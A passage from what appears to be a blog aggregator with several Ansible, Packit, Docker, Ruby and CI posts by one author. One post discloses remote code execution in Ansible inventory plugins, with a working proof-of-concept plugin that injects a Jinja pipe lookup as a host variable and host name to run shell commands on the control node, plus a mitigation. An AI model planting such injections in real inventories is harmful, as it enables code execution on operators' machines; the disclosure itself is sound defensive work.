nightly snapshots. This works beautifully for changes that land in the development and release branches of our repositories - regardless if it's foreman-installer.git or any of the puppet-*.git ones. It also works nicely for pull-requests against foreman-installer.git. But because the puppet-* repositories do not map to packages, we assumed it wouldn't work well for pull-requests against those. How can we solve this? Well, the "obvious" solution is to build the foreman-installer package via Packit also for pull-requests against the puppet-* repositories. However, as usual, the devil is in the details. Packit by default clones the repository of the pull-request and tries to create a source tarball from that using git archive. As this might be too simple for many projects, one can define a custom create-archive action that runs after the pull-request has been cloned and produces the tarball instead. We already use that in the Packit configuration for foreman-installer to run the pkg:generate_source rake target which executes librarian-puppet for us. But now the pull-request is against one of the Puppet modules, so Packit will clone that, not the installer. We gotta clone foreman-installer on our own. And then point librarian-puppet at the pull-request. Fun. Cloning is relatively simple, call git clone -- sorry Packit/Copr infrastructure. But the Puppet module pull-request? One can use :git => 'https://git.example.com/repo.git' in the Puppetfile to fetch a git repository. In fact, that's what we already do for our nightly snapshots. It also supports :ref => 'some_branch_or_tag_name', if the remote HEAD is not what you want. My brain first went "I know this! GitHub has this magic refs/pull/1/head and refs/pull/1/merge refs you can checkout to get the contents of the pull-request without bothering to add a remote for the source of the pull-request". Well, this requires to know the ID of the pull-request and Packit does not expose that in the environment variables available during create-archive. Wait, but we already have a checkout. Can we just say :git => '../.git'? Cloning a .git folder is totally possible after all.
[Librarian]     --> fatal: repository '../.git' does not exist
Could not checkout ../.git: fatal: repository '../.git' does not exist
Seems librarian disagrees. Damn. (Yes, I checked, the path exists.) does it maybe just not like relative paths?! Yepp, using an absolute path absolutely works! For some reason it ends up checking out the default HEAD of the "real" (GitHub) remote, not of ../. Luckily this can be fixed by explicitly passing :ref => 'origin/HEAD', which resolves to the branch Packit created for the pull-request. Now we just need to put all of that together and remember to execute all commands from inside the foreman-installer checkout as that is where all our vendoring recipes etc live. Putting it all together Let's look at the diff between the packit.yaml for foreman-installer and the one I've proposed for puppet-pulpcore:
--- a/foreman-installer/.packit.yaml    2024-05-14 21:45:26.545260798 +0200
+++ b/puppet-pulpcore/.packit.yaml  2024-05-14 21:44:47.834162418 +0200
@@ -18,13 +18,15 @@
 actions:
   post-upstream-clone:
     - "wget https://raw.githubusercontent.com/theforeman/foreman-packaging/rpm/develop/packages/foreman/foreman-installer/foreman-installer.spec -O foreman-installer.spec"
+    - "git clone https://github.com/theforeman/foreman-installer"
+    - "sed -i '/theforeman.pulpcore/ s@:git.*@:git => \"# __dir__ /../.git\", :ref => \"origin/HEAD\"@' foreman-installer/Puppetfile"
   get-current-version:
-    - "sed 's/-develop//' VERSION"
+    - "sed 's/-develop//' foreman-installer/VERSION"
   create-archive:
-    - bundle config set --local path vendor/bundle
-    - bundle config set --local without development:test
-    - bundle install
-    - bundle exec rake pkg:generate_source
+    - bash -c "cd foreman-installer && bundle config set --local path vendor/bundle"
+    - bash -c "cd foreman-installer && bundle config set --local without development:test"
+    - bash -c "cd foreman-installer && bundle install"
+    - bash -c "cd foreman-installer && bundle exec rake pkg:generate_source"
  1. It clones foreman-installer (in post-upstream-clone, as that felt more natural after some thinking)
  2. It adjusts the Puppetfile to use # __dir__ /../.git as the Git repository, abusing the fact that a Puppetfile is really just a Ruby script (sorry Ben!) and knows the __dir__ it lives in
  3. It fetches the version from the foreman-installer checkout, so it's sort-of reasonable
  4. It performs all building inside the foreman-installer checkout
Can this be used in other scenarios? I hope so! Vendoring is not unheard of. And testing your "consumers" (dependents? naming is hard) is good style anyway!

  1. three Ruby modules in a trench coat, so to say

28 April 2024

Evgeni Golov: Running Ansible Molecule tests in parallel

Or "How I've halved the execution time of our tests by removing ten lines". Catchy, huh? Also not exactly true, but quite close. Enjoy! Molecule?! "Molecule project is designed to aid in the development and testing of Ansible roles." No idea about the development part (I have vim and mkdir), but it's really good for integration testing. You can write different test scenarios where you define an environment (usually a container), a playbook for the execution and a playbook for verification. (And a lot more, but that's quite unimportant for now, so go read the docs if you want more details.) If you ever used Beaker for Puppet integration testing, you'll feel right at home (once you've thrown away Ruby and DSLs and embraced YAML for everything). I'd like to point out one thing, before we continue. Have another look at the quote above. "Molecule project is designed to aid in the development and testing of Ansible roles." That's right. The project was started in 2015 and was always about roles. There is nothing wrong about that, but given the Ansible world has moved on to collections (which can contain roles), you start facing challenges. Challenges using Ansible Molecule in the Collections world The biggest challenge didn't change since the last time I looked at the topic in 2020: running tests for multiple roles in a single repository ("monorepo") is tedious. Well, guess what a collection is? Yepp, a repository with multiple roles in it. It did get a bit better though. There is pytest-ansible now, which has integration for Molecule. This allows the execution of Molecule and even provides reasonable logging with something as short as:
% pytest --molecule roles/
That's much better than the shell script I used in 2020! However, being able to execute tests is one thing. Being able to execute them fast is another one. Given Molecule was initially designed with single roles in mind, it has switches to run all scenarios of a role (--all), but it has no way to run these in parallel. That's fine if you have one or two scenarios in your role repository. But what if you have 10 in your collection? "No way?!" you say after quickly running molecule test --help, "But there is "
% molecule test --help
Usage: molecule test [OPTIONS] [ANSIBLE_ARGS]...
 
  --parallel / --no-parallel      Enable or disable parallel mode. Default is disabled.
 
Yeah, that switch exists, but it only tells Molecule to place things in separate folders, you still need to parallelize yourself with GNU parallel or pytest. And here our actual journey starts! Running Ansible Molecule tests in parallel To run Molecule via pytest in parallel, we can use pytest-xdist, which allows pytest to run the tests in multiple processes. With that, our pytest call becomes something like this:
% MOLECULE_OPTS="--parallel" pytest --numprocesses auto --molecule roles/
What does that mean? However, once we actually execute it, we see:
% MOLECULE_OPTS="--parallel" pytest --numprocesses auto --molecule roles/
 
WARNING  Driver podman does not provide a schema.
INFO     debian scenario test matrix: dependency, cleanup, destroy, syntax, create, prepare, converge, idempotence, side_effect, verify, cleanup, destroy
INFO     Performing prerun with role_name_check=0...
WARNING  Retrying execution failure 250 of: ansible-galaxy collection install -vvv --force ../..
ERROR    Command returned 250 code:
 
OSError: [Errno 39] Directory not empty: 'roles'
 
FileExistsError: [Errno 17] File exists: b'/home/user/namespace.collection/collections/ansible_collections/namespace/collection'
 
FileNotFoundError: [Errno 2] No such file or directory: b'/home/user/namespace.collection//collections/ansible_collections/namespace/collection/roles/my_role/molecule/debian/molecule.yml'
You might see other errors, other paths, etc, but they all will have one in common: they indicate that either files or directories are present, while the tool expects them not to be, or vice versa. Ah yes, that fine smell of race conditions. I'll spare you the wild-goose chase I went on when trying to find out what the heck was calling ansible-galaxy collection install here. Instead, I'll just point at the following line:
INFO     Performing prerun with role_name_check=0...
What is this "prerun" you ask? Well "To help Ansible find used modules and roles, molecule will perform a prerun set of actions. These involve installing dependencies from requirements.yml specified at the project level, installing a standalone role or a collection." Turns out, this step is not --parallel-safe (yet?). Luckily, it can easily be disabled, for all our roles in the collection:
% mkdir -p .config/molecule
% echo 'prerun: false' >> .config/molecule/config.yml
This works perfectly, as long as you don't have any dependencies. And we don't have any, right? We didn't define any in a molecule/collections.yml, our collection has none. So let's push a PR with that and see what our CI thinks.
OSError: [Errno 39] Directory not empty: 'tests'
Huh?
FileExistsError: [Errno 17] File exists: b'remote.sh' -> b'/home/runner/work/namespace.collection/namespace.collection/collections/ansible_collections/ansible/posix/tests/utils/shippable/aix.sh'
What?
ansible_compat.errors.InvalidPrerequisiteError: Found collection at '/home/runner/work/namespace.collection/namespace.collection/collections/ansible_collections/ansible/posix' but missing MANIFEST.json, cannot get info.
Okay, okay, I get the idea But why? Well, our collection might not have any dependencies, BUT MOLECULE HAS! When using Docker containers, it uses community.docker, when using Podman containers.podman, etc So we have to install those before running Molecule, and everything should be fine. We even can use Molecule to do this!
$ molecule dependency --scenario <scenario>
And with that knowledge, the patch to enable parallel Molecule execution on GitHub Actions using pytest-xdist becomes:
diff --git a/.config/molecule/config.yml b/.config/molecule/config.yml
new file mode 100644
index 0000000..32ed66d
--- /dev/null
+++ b/.config/molecule/config.yml
@@ -0,0 +1 @@
+prerun: false
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 0f9da0d..df55a15 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -58,9 +58,13 @@ jobs:
       - name: Install Ansible
         run: pip install --upgrade https://github.com/ansible/ansible/archive/$  matrix.ansible  .tar.gz
       - name: Install dependencies
-        run: pip install molecule molecule-plugins pytest pytest-ansible
+        run: pip install molecule molecule-plugins pytest pytest-ansible pytest-xdist
+      - name: Install collection dependencies
+        run: cd roles/repository && molecule dependency -s suse
       - name: Run tests
-        run: pytest -vv --molecule roles/
+        run: pytest -vv --numprocesses auto --molecule roles/
+        env:
+          MOLECULE_OPTS: --parallel
   ansible-lint:
     runs-on: ubuntu-latest
But you promised us to delete ten lines, that's just a +7-2 patch! Oh yeah, sorry, the +10-20 (so a net -10) is the foreman-operations-collection version of the patch, that also migrates from an ugly bash script to pytest-ansible. And yes, that cuts down the execution from ~26 minutes to ~13 minutes. In the collection I originally tested this with, it's a more moderate "from 8-9 minutes to 5-6 minutes", which is still good though :)

11 March 2024

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now. TL;DR Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it. Inventory plugins Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman. For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object. And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell. Let that sink in for a moment, and then we'll look at an example. Example inventory plugin
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '  lookup("pipe", "touch /tmp/hacked" )  ')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:
  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory
In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar. The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host. Using the example inventory plugin Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from). And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need. If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
 
    "_meta":  
        "hostvars":  
            "exploit.example.com":  
                "ansible_connection": "local",
                "something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
             
         
     ,
    "all":  
        "children": [
            "ungrouped"
        ]
     ,
    "ungrouped":  
        "hosts": [
            "exploit.example.com"
        ]
     
 
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.) So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string. Executing a playbook, interpreting Jinja To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM. Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]
TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] =>  
    "hostvars[inventory_hostname]":  
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
         
        "something_funny": ""
     
 
PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was lookup("pipe", "touch /tmp/hacked" ) and touch does not return anything. But it did create the file!
% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/ . Why is this possible? This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var
 
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('  lookup("pipe", "touch /tmp/hacked" )  '))
Which then gets rendered as a string when dumping the variables using debug:
"something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
But it seems inventories don't do this:
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)
(aws_ec2.py)
for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)
(hcloud.py)
for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
(foreman.py) And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe". Can something similar happen in other parts of Ansible? It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481 But even if we only look at inventories, add_host(host) can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol  lookup("pipe", "touch /tmp/hacked-host" )  ')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
fatal: [lol  lookup("pipe", "touch /tmp/hacked-host" )  ]: UNREACHABLE! =>  "changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true 
PLAY RECAP ************************************************************************************************
lol  lookup("pipe", "touch /tmp/hacked-host" )   : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
Affected versions I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

8 April 2023

Evgeni Golov: Running autopkgtest with Docker inside Docker

While I am not the biggest fan of Docker, I must admit it has quite some reach across various service providers and can often be seen as an API for running things in isolated environments. One such service provider is GitHub when it comes to their Actions service. I have no idea what isolation technology GitHub uses on the outside of Actions, but inside you just get an Ubuntu system and can run whatever you want via Docker as that comes pre-installed and pre-configured. This especially means you can run things inside vanilla Debian containers, that are free from any GitHub or Canonical modifications one might not want ;-) So, if you want to run, say, lintian from sid, you can define a job to do so:
  lintian:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run lintian on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends lintian
      - run: lintian --info --display-info *.changes
This will run on Ubuntu (latest right now means 22.04 for GitHub), but then use Docker to run the debian:sid container and execute all further steps inside it. Pretty short and straight forward, right? Now lintian does static analysis of the package, it doesn't need to install it. What if we want to run autopkgtest that performs tests on an actually installed package? autopkgtest comes with various "virt servers", which are providing isolation of the testbed, so that it does not interfere with the host system. The simplest available virt server, autopkgtest-virt-null doesn't actually provide any isolation, as it runs things directly on the host system. This might seem fine when executed inside an ephemeral container in an CI environment, but it also means that multiple tests have the potential to influence each other as there is no way to revert the testbed to a clean state. For that, there are other, "real", virt servers available: chroot, lxc, qemu, docker and many more. They all have one in common: to use them, one needs to somehow provide an "image" (a prepared chroot, a tarball of a chroot, a vm disk, a container, , you get it) to operate on and most either bring a tool to create such an "image" or rely on a "registry" (online repository) to provide them. Most users of autopkgtest on GitHub (that I could find with their terrible search) are using either the null or the lxd virt servers. Probably because these are dead simple to set up (null) or the most "native" (lxd) in the Ubuntu environment. As I wanted to execute multiple tests that for sure would interfere with each other, the null virt server was out of the discussion pretty quickly. The lxd one also felt odd, as that meant I'd need to set up lxd (can be done in a few commands, but still) and it would need to download stuff from Canonical, incurring costs (which I couldn't care less about) and taking time which I do care about!). Enter autopkgtest-virt-docker, which recently was added to autopkgtest! No need to set things up, as GitHub already did all the Docker setup for me, and almost no waiting time to download the containers, as GitHub does heavy caching of stuff coming from Docker Hub (or at least it feels like that). The only drawback? It was added in autopkgtest 5.23, which Ubuntu 22.04 doesn't have. "We need to go deeper" and run autopkgtest from a sid container! With this idea, our current job definition would look like this:
  autopkgtest:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run autopkgtest on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends autopkgtest autodep8 docker.io
      - run: autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid
(--setup-commands="apt-get update" is needed as the container comes with an empty apt cache and wouldn't be able to find dependencies of the tested package) However, this will fail:
# autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid
autopkgtest [10:20:54]: starting date and time: 2023-04-07 10:20:54+0000
autopkgtest [10:20:54]: version 5.28
autopkgtest [10:20:54]: host a82a11789c0d; command line:
  /usr/bin/autopkgtest bley_2.0.0-1_amd64.changes '--setup-commands=apt-get update' -- docker debian:sid
Unexpected error:
Traceback (most recent call last):
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 829, in mainloop
    command()
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 758, in command
    r = f(c, ce)
        ^^^^^^^^
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 692, in cmd_copydown
    copyupdown(c, ce, False)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 580, in copyupdown
    copyupdown_internal(ce[0], c[1:], upp)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 607, in copyupdown_internal
    copydown_shareddir(sd[0], sd[1], dirsp, downtmp_host)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 562, in copydown_shareddir
    shutil.copy(host, host_tmp)
  File "/usr/lib/python3.11/shutil.py", line 419, in copy
    copyfile(src, dst, follow_symlinks=follow_symlinks)
  File "/usr/lib/python3.11/shutil.py", line 258, in copyfile
    with open(dst, 'wb') as fdst:
         ^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/tmp/autopkgtest-virt-docker.shared.kn7n9ioe/downtmp/wrapper.sh'
autopkgtest [10:21:07]: ERROR: testbed failure: unexpected eof from the testbed
Running the same thing locally of course works, so there has to be something special about the setup at GitHub. But what?! A bit of digging revealed that autopkgtest-virt-docker tries to use a shared directory (using Dockers --volume) to exchange things with the testbed (for the downtmp-host capability). As my autopkgtest is running inside a container itself, nothing it tells the Docker deamon to mount will be actually visible to it. In retrospect this makes total sense and autopkgtest-virt-docker has a switch to "fix" the issue: --remote as the Docker deamon is technically remote when viewed from the place autopkgtest runs at. I'd argue this is not a bug in autopkgtest(-virt-docker), as the situation is actually cared for. There is even some auto-detection of "remote" daemons in the code, but that doesn't "know" how to detect the case where the daemon socket is mounted (vs being set as an environment variable). I've opened an MR (assume remote docker when running inside docker) which should detect the case of running inside a Docker container which kind of implies the daemon is remote. Not sure the patch will be accepted (it is a band-aid after all), but in the meantime I am quite happy with using --remote and so could you ;-)

7 December 2021

Evgeni Golov: The Mocking will continue, until CI improves

One might think, this blog is exclusively about weird language behavior and yelling at computers Well, welcome to another episode of Jackass! Today's opponent is Ruby, or maybe minitest , or maybe Mocha. I'm not exactly sure, but it was a rather amusing exercise and I like to share my nightmares ;) It all started with the classical "you're using old and unmaintained software, please switch to something new". The first attempt was to switch from the ci_reporter_minitest plugin to the minitest-ci plugin. While the change worked great for Foreman itself, it broke the reporting in Katello - the tests would run but no junit.xml was generated and Jenkins rightfully complained that it got no test results. While investigating what the hell was wrong, we realized that Katello was already using a minitest reporting plugin: minitest-reporters. Loading two different reporting plugins seemed like a good source for problems, so I tried using the same plugin for Foreman too. Guess what? After a bit of massaging (mostly to disable the second minitest-reporters initialization in Katello) reporting of test results from Katello started to work like a charm. But now the Foreman tests started to fail. Not fail to report, fail to actually run. WTH The failure was quite interesting too:
test/unit/parameter_filter_test.rb:5:in  block in <class:ParameterFilterTest>':
  Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)
Yes, this is a single test file failing, all others were fine. The failing code doesn't look problematic on first glance:
require 'test_helper'
class ParameterFilterTest < ActiveSupport::TestCase
  let(:klass) do
    mock('Example').tap do  k 
      k.stubs(:name).returns('Example')
    end
  end
  test 'something' do
    something
  end
end
The failing line (5) is mock('Example').tap and for some reason Mocha thinks it's not initialized here. This certainly has something to do with how the various reporting plugins inject themselves, but I really didn't want to debug how to run two reporting plugins in parallel (which, as you remember, didn't expose this behavior). So the only real path forward was to debug what's happening here. Calling the test on its own, with one of the working reporter was the first step:
$ bundle exec rake test TEST=test/unit/parameter_filter_test.rb TESTOPTS=-v
 
#<Mocha::Mock:0x0000557bf1f22e30>#test_0001_permits plugin-added attribute = 0.04 s = .
#<Mocha::Mock:0x0000557bf12cf750>#test_0002_permits plugin-added attributes from blocks = 0.49 s = .
 
Wait, what? #<Mocha::Mock: >? Shouldn't this read more like ParameterFilterTest:: as it happens for every single other test in our test suite? It definitely should! That's actually great, as it tells us that there is really something wrong with the test and the change of the reporting plugin just makes it worse. What comes next is sheer luck. Well, that, and years of experience in yelling at computers. We use let(:klass) to define an object called klass and this object is a Mocha::Mock that we'll use in our tests later. Now klass is a very common term in Ruby when talking about classes and needing to store them mostly because one can't use class which is a keyword. Is something else in the stack using klass and our let is overriding that, making this whole thing explode? It was! The moment we replaced klass with klass1 (silly, I know, but there also was a klass2 in that code, so it did fit), things started to work nicely. I really liked Tomer's comment in the PR: "no idea why, but I am not going to dig into mocha to figure that out." Turns out, I couldn't let (HAH!) the code rest and really wanted to understand what happened there. What I didn't want to do is to debug the whole Foreman test stack, because it is massive. So I started to write a minimal reproducer for the issue. All starts with a Gemfile, as we need a few dependencies:
gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'
Then a Rakefile:
require 'rake/testtask'
Rake::TestTask.new(:test) do  t 
  t.libs << 'test'
  t.test_files = FileList["test/**/*_test.rb"]
end
task :default => :test
And a test! I took the liberty to replace ActiveSupport::TestCase with Minitest::Test, as the test won't be using any Rails features and I wanted to keep my environment minimal.
require 'minitest/autorun'
require 'minitest/spec'
require 'mocha/minitest'
class ParameterFilterTest < Minitest::Test
  extend Minitest::Spec::DSL
  let(:klass) do
    mock('Example').tap do  k 
      k.stubs(:name).returns('Example')
    end
  end
  def test_lol
    assert klass
  end
end
Well, damn, this passed! Is it Rails after all that breaks stuff? Let's add it to the Gemfile!
$ vim Gemfile
$ bundle install
$ bundle exec rake test TESTOPTS=-v
 
#<Mocha::Mock:0x0000564bbfe17e98>#test_lol = 0.00 s = .
Wait, I didn't change anything and it's already failing?! Fuck! I mean, cool! But the test isn't minimal yet. What can we reduce? let is just a fancy, lazy def, right? So instead of let(:klass) we should be able to write def class and achieve a similar outcome and drop that Minitest::Spec.
require 'minitest/autorun'
require 'mocha/minitest'
class ParameterFilterTest < Minitest::Test
  def klass
    mock
  end
  def test_lol
    assert klass
  end
end
$ bundle exec rake test TESTOPTS=-v
 
/home/evgeni/Devel/minitest-wtf/test/parameter_filter_test.rb:5:in  klass': Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:68:in  format_line'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:15:in  record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:682:in  block in record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in  each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in  record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:324:in  run_one_method'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:311:in  block (2 levels) in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in  each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in  block in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:350:in  on_signal'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:337:in  with_info_handler'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:309:in  run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in  block in __run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in  map'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in  __run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:136:in  run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:63:in  block in autorun'
rake aborted!
Oh nice, this is even better! Instead of the mangled class name, we now get the very same error the Foreman tests aborted with, plus a nice stack trace! But wait, why is it pointing at railties? We're not loading that! Anyways, lets look at railties-6.1.4.1/lib/rails/test_unit/reporter.rb, line 68
def format_line(result)
  klass = result.respond_to?(:klass) ? result.klass : result.class
  "%s#%s = %.2f s = %s" % [klass, result.name, result.time, result.result_code]
end
Heh, this is touching result.klass, which we just messed up. Nice! But quickly back to railties What if we only add that to the Gemfile, not full blown Rails?
gem 'railties'
gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'
Yepp, same failure. Also happens with require => false added to the line, so it seems railties somehow injects itself into rake even if nothing is using it?! "Cool"! By the way, why are we still pinning minitest to < 5.11? Oh right, this was the original reason to look into that whole topic. And, uh, it's pointing at klass there already! 4 years ago! So lets remove that boundary and funny enough, now tests are passing again, even if we use klass! Minitest 5.11 changed how Minitest::Test is structured, and seems not to rely on klass at that point anymore. And I guess Rails also changed a bit since the original pin was put in place four years ago. I didn't want to go another rabbit hole, finding out what changed in Rails, but I did try with 5.0 (well, 5.0.7.2) to be precise, and the output with newer (>= 5.11) Minitest was interesting:
$ bundle exec rake test TESTOPTS=-v
 
Minitest::Result#test_lol = 0.00 s = .
It's leaking Minitest::Result as klass now, instead of Mocha::Mock. So probably something along these lines was broken 4 years ago and triggered this pin. What do we learn from that?
  • klass is cursed and shouldn't be used in places where inheritance and tooling might decide to use it for some reason
  • inheritance is cursed - why the heck are implementation details of Minitest leaking inside my tests?!
  • tooling is cursed - why is railties injecting stuff when I didn't ask it to?!
  • dependency pinning is cursed - at least if you pin to avoid an issue and then forget about said issue for four years
  • I like cursed things!

3 December 2021

Evgeni Golov: Dependency confusion in the Ansible Galaxy CLI

I hope you enjoyed my last post about Ansible Galaxy Namespaces. In there I noted that I originally looked for something completely different and the namespace takeover was rather accidental. Well, originally I was looking at how the different Ansible content hosting services and their client (ansible-galaxy) behave in regard to clashes in naming of the hosted content. "Ansible content hosting services"?! There are currently three main ways for users to obtain Ansible content:
  • Ansible Galaxy - the original, community oriented, free hosting platform
  • Automation Hub - the place for Red Hat certified and supported content, available only with a Red Hat subscription, hosted by Red Hat
  • Ansible Automation Platform - the on-premise version of Automation Hub, syncs content from there and allows customers to upload own content
